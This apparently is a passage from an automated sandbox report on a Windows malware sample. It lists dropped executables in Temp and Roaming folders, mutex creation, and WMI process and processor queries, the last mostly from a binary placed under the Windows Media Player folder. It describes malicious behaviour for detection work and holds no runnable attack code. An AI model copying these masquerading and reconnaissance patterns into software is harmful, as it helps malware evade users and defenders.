                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1384:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2456
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
